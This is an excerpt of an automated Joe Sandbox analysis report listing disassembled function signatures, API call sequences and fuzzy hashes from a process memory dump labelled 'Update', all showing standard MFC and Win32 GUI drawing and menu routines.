                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: FillRect$BrushCreateH_prolog3Solid
                                              • String ID: (^4l$(^4l$(^4l$(^4l$(^4l$(^4l
                                              • API String ID: 1242064992-2836929755
                                              • Opcode ID: 538dedd4ec5f02a43f506904489b566450c5664b39a3c75724686f7c2412e32c
                                              • Instruction ID: 0ec3ed0885cb342a7d0b878fcb45662e916059ac8b413c55878fd3d3b93113e2
                                              • Opcode Fuzzy Hash: 538dedd4ec5f02a43f506904489b566450c5664b39a3c75724686f7c2412e32c
                                              • Instruction Fuzzy Hash: 02A16F71E0121ADFCF08CF98C9959EDBBB6FF59304F04811AF905AB690D774AA09CB90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C244E3D
                                                • Part of subcall function 6C1C9B7C: __EH_prolog3.LIBCMT ref: 6C1C9B83
                                                • Part of subcall function 6C2D4A63: __EH_prolog3.LIBCMT ref: 6C2D4A6A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: H_prolog3
                                              • String ID: MFCButton$MFCColorButton$MFCEditBrowse$MFCFontComboBox$MFCLink$MFCMaskedEdit$MFCMenuButton$MFCPropertyGrid$MFCShellList$MFCShellTree$MFCVSListBox
                                              • API String ID: 431132790-2110171958
                                              • Opcode ID: 9e95b953eed212e2b1354c86230244664dd2cdc666c78a8bfe81287dbc993cdd
                                              • Instruction ID: 1c8e59a8363dc43d1e13d6dd17beac36b260f1ec98805521cf753017803705b9
                                              • Opcode Fuzzy Hash: 9e95b953eed212e2b1354c86230244664dd2cdc666c78a8bfe81287dbc993cdd
                                              • Instruction Fuzzy Hash: 7261C635A0530A9AEF0DDAB4D510BEE73E45F1A21DF20542AF851E7EC0DF39860C8656
                                              APIs
                                              • LoadResource.KERNEL32(?,?,?,?,00000000), ref: 6C1D0890
                                              • LockResource.KERNEL32(00000000), ref: 6C1D089F
                                                • Part of subcall function 6C1D07DA: _memcpy_s.LIBCMT ref: 6C1D07E9
                                              • GetSysColor.USER32 ref: 6C1D0923
                                              • GetSysColor.USER32 ref: 6C1D0936
                                              • GetSysColor.USER32 ref: 6C1D0951
                                              • GetDC.USER32(00000000), ref: 6C1D0987
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 6C1D0997
                                              • CreateCompatibleDC.GDI32(00000000), ref: 6C1D09A5
                                              • SelectObject.GDI32(00000000,?), ref: 6C1D09B1
                                              • StretchDIBits.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 6C1D09E4
                                              • SelectObject.GDI32(00000000,00000000), ref: 6C1D09EC
                                              • DeleteDC.GDI32(00000000), ref: 6C1D09F3
                                              • ReleaseDC.USER32(00000000,00000000), ref: 6C1D09FF
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Color$CompatibleCreateObjectResourceSelect$BitmapBitsDeleteLoadLockReleaseStretch_memcpy_s
                                              • String ID:
                                              • API String ID: 367613035-0
                                              • Opcode ID: a2e92a1c9623fa815123e0612b7a62a07194a1c21104537568389cde2e26951f
                                              • Instruction ID: 5d2dc36c9bca4652914670a518748aa1e9d3f0abe4151f960c956911701540a1
                                              • Opcode Fuzzy Hash: a2e92a1c9623fa815123e0612b7a62a07194a1c21104537568389cde2e26951f
                                              • Instruction Fuzzy Hash: 5041B572A02218AFEB009F58CC44ABFBBBDFF87355B158059F506E7240DB70A901CBA1
                                              APIs
                                              • EnableMenuItem.USER32(?,?,00000403), ref: 6C1E45B8
                                              • GetFocus.USER32 ref: 6C1E45D2
                                              • GetParent.USER32(?), ref: 6C1E45DD
                                              • SendMessageW.USER32(?,00000028,00000000,00000000), ref: 6C1E45F2
                                              • CheckMenuItem.USER32(?,?,00000400), ref: 6C1E4645
                                              • SendMessageW.USER32(?,00000087,00000000,00000000), ref: 6C1E4660
                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 6C1E467D
                                              • SetMenuItemBitmaps.USER32(?,?,00000400,00000000,00000000), ref: 6C1E46EA
                                              • SetMenuItemInfoW.USER32(?,?,00000001,?), ref: 6C1E473A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: ItemMenu$MessageSend$BitmapsCheckEnableFocusInfoParent
                                              • String ID: 0$@
                                              • API String ID: 2977031974-1545510068
                                              • Opcode ID: 0c1f2996df228a85c5acd599f4d77957afc0c11da104341d189b13a3de4b2783
                                              • Instruction ID: a872ca6018eb2f532e1389c4602c7664791b589d2cb66b3caae520d7e67b7467
                                              • Opcode Fuzzy Hash: 0c1f2996df228a85c5acd599f4d77957afc0c11da104341d189b13a3de4b2783
                                              • Instruction Fuzzy Hash: 7C51A071601A04EFEB248F95C844B9ABBB9FF49709F108629E559DBA50CB70E885CFD0
                                              APIs
                                              • GetCursorPos.USER32(?), ref: 6C28500E
                                              • MonitorFromPoint.USER32(0^5l,?,00000002), ref: 6C28503D
                                              • GetMonitorInfoW.USER32(00000000), ref: 6C285044
                                              • CopyRect.USER32(?,?), ref: 6C285056
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C285066
                                              • OffsetRect.USER32(?,?,00000000), ref: 6C285089
                                              • OffsetRect.USER32(?,?,00000000), ref: 6C2850AC
                                              • OffsetRect.USER32(?,00000000,?), ref: 6C2850D1
                                              • OffsetRect.USER32(?,00000000,?), ref: 6C2850F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Offset$InfoMonitor$CopyCursorFromParametersPointSystem
                                              • String ID: ($0^5l
                                              • API String ID: 4030222242-507558882
                                              • Opcode ID: 752b86e586afb63b4490b771d85ca6475a80002066b49e1b565bf0b3cb32f461
                                              • Instruction ID: 8bbc037515c0c83b13badd6bbded98b335cd76f83e16d4487487e7a6a2f02bee
                                              • Opcode Fuzzy Hash: 752b86e586afb63b4490b771d85ca6475a80002066b49e1b565bf0b3cb32f461
                                              • Instruction Fuzzy Hash: 48411071A1250AEFEB08CF64C984D7EF779FB49705720822DE817A7644DB70AD09CB91
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C20048E
                                              • SetCursor.USER32(?,00000048,6C1FF935,00000000,00000200,00000000), ref: 6C20052D
                                                • Part of subcall function 6C1CD0FD: __EH_prolog3.LIBCMT ref: 6C1CD104
                                                • Part of subcall function 6C1CD0FD: GetDC.USER32(00000000), ref: 6C1CD130
                                                • Part of subcall function 6C1E9E45: __EH_prolog3_GS.LIBCMT ref: 6C1E9E4C
                                                • Part of subcall function 6C1E9E45: CreateRectRgnIndirect.GDI32(?), ref: 6C1E9E84
                                                • Part of subcall function 6C1E9E45: CopyRect.USER32(?,?), ref: 6C1E9E98
                                                • Part of subcall function 6C1E9E45: InflateRect.USER32(?,?,?), ref: 6C1E9EAE
                                                • Part of subcall function 6C1E9E45: IntersectRect.USER32(?,?,?), ref: 6C1E9EBA
                                                • Part of subcall function 6C1E9E45: CreateRectRgnIndirect.GDI32(?), ref: 6C1E9EC4
                                                • Part of subcall function 6C1E9E45: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C1E9ED9
                                                • Part of subcall function 6C1E9E45: CombineRgn.GDI32(?,?,?,00000003), ref: 6C1E9EF3
                                                • Part of subcall function 6C1E9E45: CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 6C1E9F3A
                                                • Part of subcall function 6C1E9E45: SetRectRgn.GDI32(?,?,00000004,?,?), ref: 6C1E9F57
                                                • Part of subcall function 6C1E9E45: CopyRect.USER32(?,?), ref: 6C1E9F62
                                                • Part of subcall function 6C1CD152: ReleaseDC.USER32(?,00000000), ref: 6C1CD186
                                              • GetFocus.USER32 ref: 6C2005C4
                                              • SetTimer.USER32(?,0000EC07,000001F4,00000000), ref: 6C2006B5
                                              • TrackMouseEvent.USER32(?,?,?,?,?,?,00000000), ref: 6C2006EC
                                              • SendMessageW.USER32(?,00000362,0000E001,00000000), ref: 6C200772
                                              • InvalidateRect.USER32(?,?,00000001,?,?,?,?,?,?,00000000), ref: 6C2008AD
                                              • InflateRect.USER32(?,00000000,?), ref: 6C2008F3
                                              • RedrawWindow.USER32(?,?,00000000,00000401,?,?,?,?,?,00000000), ref: 6C200906
                                              • KillTimer.USER32(?,0000EC07,?,?,?,?,?,00000000), ref: 6C200995
                                              • SetTimer.USER32(?,0000EC07,000001F4,00000000), ref: 6C2009B3
                                              • UpdateWindow.USER32(?), ref: 6C2009DC
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Create$Timer$CopyH_prolog3_IndirectInflateWindow$CombineCursorEventFocusH_prolog3IntersectInvalidateKillMessageMouseRedrawReleaseSendTrackUpdate
                                              • String ID:
                                              • API String ID: 3035320136-0
                                              • Opcode ID: f1fa0bc6582f2ea4c3cb26b0edcdabdd59b3dc1964eef665e92867c93f9d523b
                                              • Instruction ID: 6e21df7ca7daf2e751cdefdab3d19edafcb87afa5939a7e056a3b0ab6e38d180
                                              • Opcode Fuzzy Hash: f1fa0bc6582f2ea4c3cb26b0edcdabdd59b3dc1964eef665e92867c93f9d523b
                                              • Instruction Fuzzy Hash: E0F18230701A5AAFEB09CF64C854BEDBBB5BF45319F10431AF829A7690DB74A851CF81
                                              APIs
                                                • Part of subcall function 6C2CD165: LoadCursorW.USER32(00000000,00007F8B), ref: 6C2CD17D
                                                • Part of subcall function 6C2CD165: LoadCursorW.USER32(?,00007901), ref: 6C2CD19A
                                              • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 6C2CCF88
                                              • PostMessageW.USER32(?,00000111,0000E145,?), ref: 6C2CD004
                                              • SendMessageW.USER32(?,00000362,0000E002,00000000), ref: 6C2CD029
                                              • GetCursorPos.USER32(?), ref: 6C2CD043
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6C2CD06F
                                              • ReleaseCapture.USER32 ref: 6C2CD0C6
                                              • SetCapture.USER32(?), ref: 6C2CD0CF
                                              • ReleaseCapture.USER32 ref: 6C2CD0DB
                                              • SendMessageW.USER32(?,00000362,?,00000000), ref: 6C2CD0ED
                                              • SendMessageW.USER32(?,00000111,0000E147,00000000), ref: 6C2CD12D
                                              • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 6C2CD15A
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Message$CaptureCursorSend$LoadPeekPostRelease
                                              • String ID:
                                              • API String ID: 291007519-0
                                              • Opcode ID: b6f9106e682b671b3bfab6d90bf19f9755b8f4589f3d0f2f203dd2ad44df3d8d
                                              • Instruction ID: 8987110920d4d73c5ac3c6782ff94bc762a42d92fd2119ea98b79c203ed4381b
                                              • Opcode Fuzzy Hash: b6f9106e682b671b3bfab6d90bf19f9755b8f4589f3d0f2f203dd2ad44df3d8d
                                              • Instruction Fuzzy Hash: 93516075B41209EFEF019FA5C848E9E7BB9FF8A705F100169FD06AB291CB709901CB61
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C224E53
                                              • FillRect.USER32(?,?,?), ref: 6C224F60
                                              • InflateRect.USER32(?,00000000,000000FF), ref: 6C224F9B
                                              • FillRect.USER32(?,?,?), ref: 6C224FB9
                                              • GetParent.USER32(?), ref: 6C22504B
                                              • GetParent.USER32(?), ref: 6C224FF5
                                                • Part of subcall function 6C2852C3: IsWindow.USER32(00000000), ref: 6C2852E2
                                              • GetParent.USER32(?), ref: 6C225124
                                              • GetParent.USER32(?), ref: 6C225183
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Parent$Rect$Fill$H_prolog3_InflateWindow
                                              • String ID: 0^5l
                                              • API String ID: 353189481-1366870978
                                              • Opcode ID: 540c6708ed999146b014e5e2e4d911cd91d2411ac1932b4f7b166e3114cea0f2
                                              • Instruction ID: 81a778654b442c97d81c9bf775e1324ce761359c9b301751ee166ae76cf20902
                                              • Opcode Fuzzy Hash: 540c6708ed999146b014e5e2e4d911cd91d2411ac1932b4f7b166e3114cea0f2
                                              • Instruction Fuzzy Hash: A1E14E31A01619DFDF05DFA4C884AEEBBBABF4A314F150129FD06BB640DB75A905CB90
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 6C216F62
                                              • InflateRect.USER32(?), ref: 6C216F8A
                                              • DrawFocusRect.USER32(?,?), ref: 6C216FF4
                                              • InflateRect.USER32(?), ref: 6C217008
                                              • InflateRect.USER32(?), ref: 6C217050
                                              • InflateRect.USER32(?), ref: 6C2170A0
                                              • CreateHatchBrush.GDI32(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2170C4
                                              • FillRect.USER32(?,?,00000000), ref: 6C2170DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$Inflate$BrushCreateDrawFillFocusH_prolog3Hatch
                                              • String ID: (^4l
                                              • API String ID: 4128771895-3721299443
                                              • Opcode ID: 7c76b9b6778883f9070974a4508df4e8ed5502cc9a7ee3c0a7378487b5357f8d
                                              • Instruction ID: 89432c849c34a6451f20bb832006e90de461655dd079cd8382b252e46b005ed8
                                              • Opcode Fuzzy Hash: 7c76b9b6778883f9070974a4508df4e8ed5502cc9a7ee3c0a7378487b5357f8d
                                              • Instruction Fuzzy Hash: C851297190011DAFDB10DFA5C884EDF7BBCEF4A715F008166F915A7A50DB749A08CBA1
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C252823
                                                • Part of subcall function 6C1CD1DC: __EH_prolog3.LIBCMT ref: 6C1CD1E3
                                                • Part of subcall function 6C1CD1DC: GetWindowDC.USER32(00000000,00000004,6C1E78A0,00000000), ref: 6C1CD20F
                                              • GetClientRect.USER32(?,?), ref: 6C25284D
                                              • GetWindowRect.USER32(?,?), ref: 6C252864
                                                • Part of subcall function 6C1CD2F4: ScreenToClient.USER32(?,00000000), ref: 6C1CD303
                                                • Part of subcall function 6C1CD2F4: ScreenToClient.USER32(?,00000008), ref: 6C1CD310
                                              • OffsetRect.USER32(?,?,?), ref: 6C252886
                                                • Part of subcall function 6C1CCCC1: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 6C1CCCF8
                                                • Part of subcall function 6C1CCCC1: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 6C1CCD15
                                                • Part of subcall function 6C1E4E72: GetWindowLongW.USER32(?,000000EC), ref: 6C1E4E7F
                                              • GetWindowRect.USER32(?,?), ref: 6C2528DA
                                              • GetRgnBox.GDI32(?,?), ref: 6C2528F5
                                              • OffsetRect.USER32(?,?,?), ref: 6C25290F
                                              • CreateRectRgnIndirect.GDI32(?), ref: 6C252929
                                                • Part of subcall function 6C1CCD83: ExtSelectClipRgn.GDI32(?,00000000,?), ref: 6C1CCDA6
                                                • Part of subcall function 6C1CCD83: ExtSelectClipRgn.GDI32(?,00000000,?), ref: 6C1CCDBF
                                              • OffsetRgn.GDI32(?,?,?), ref: 6C252964
                                              • OffsetRect.USER32(?,?,?), ref: 6C252985
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: Rect$ClipOffsetWindow$Client$ExcludeScreenSelect$CreateH_prolog3H_prolog3_IndirectLong
                                              • String ID:
                                              • API String ID: 3148124242-0
                                              • Opcode ID: 191d47878956a87fee8eeee7d830d5383a66a84a65cc55702cce953aa105d403
                                              • Instruction ID: efb46be10e2519306884d5f439f9e63ad75687e6f28b6da23cb2bb3968ebbb06
                                              • Opcode Fuzzy Hash: 191d47878956a87fee8eeee7d830d5383a66a84a65cc55702cce953aa105d403
                                              • Instruction Fuzzy Hash: 28914071E1061D9FCF01DFA4C898AEEBBB9FF5A304F144119F806AB650DB74A945CB50
                                              APIs
                                                • Part of subcall function 6C1CC827: SelectObject.GDI32(?,00000000), ref: 6C1CC847
                                                • Part of subcall function 6C1CC827: SelectObject.GDI32(?,00000000), ref: 6C1CC85D
                                              • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 6C29E5F4
                                              • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 6C29E60E
                                              • PatBlt.GDI32(?,00F00021,?,00F00021,?,00F00021), ref: 6C29E62C
                                              • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 6C29E64A
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 6C29E659
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 6C29E665
                                              • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 6C29E69D
                                              • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 6C29E6C0
                                              • PatBlt.GDI32(?,00F00021,?,00F00021,?,00F00021), ref: 6C29E6E7
                                              • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 6C29E70E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551676156.000000006C3A5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_6c1b0000_Update.jbxd
                                              Similarity
                                              • API ID: InflateObjectRectSelect
                                              • String ID:
                                              • API String ID: 4092023516-0
                                              • Opcode ID: b28280b2977bee43de802e3b81b7de4e7bc1d7264c140888cd540af81400420f
                                              • Instruction ID: 6762da27b9a5060d13990ff0490afce56afe691b1d636c0684a183f3ca674c7d
                                              • Opcode Fuzzy Hash: b28280b2977bee43de802e3b81b7de4e7bc1d7264c140888cd540af81400420f
                                              • Instruction Fuzzy Hash: 8E51E37260024AAFDF01DFA8CD89DEF3FBAFB89314B044118FD1596254CA75E860DB61
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 6C1E0E0B
                                              • GetMenuItemCount.USER32(?), ref: 6C1E0E37
                                              • GetSubMenu.USER32(?,00000000), ref: 6C1E0E6D
                                              • GetMenuState.USER32(?,?,00000400), ref: 6C1E0E8A
                                              • GetSubMenu.USER32(?,00000000), ref: 6C1E0EE7
                                              • GetMenuStringW.USER32(?,?,?,00000100,00000400), ref: 6C1E0F10
                                              • AppendMenuW.USER32(?,00000010,?,?), ref: 6C1E0F98
                                              • GetMenuItemCount.USER32(00000000), ref: 6C1E1008
                                              • InsertMenuW.USER32(?,00000000,?,00000000), ref: 6C1E1035
                                              • GetMenuItemID.USER32(?,?), ref: 6C1E1066
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.3551415916.000000006C1B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C1B0000, based on PE: true
                                              • Associated: 00000003.00000002.3551397153.000000006C1B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551529781.000000006C343000.00000002.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551604983.000000006C398000.00000004.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551622662.000000006C39B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                              • Associated: 00000003.00000002.3551640187.000000006C39D000.00000004.00000001.01000000.00000006.sdmpDownload File
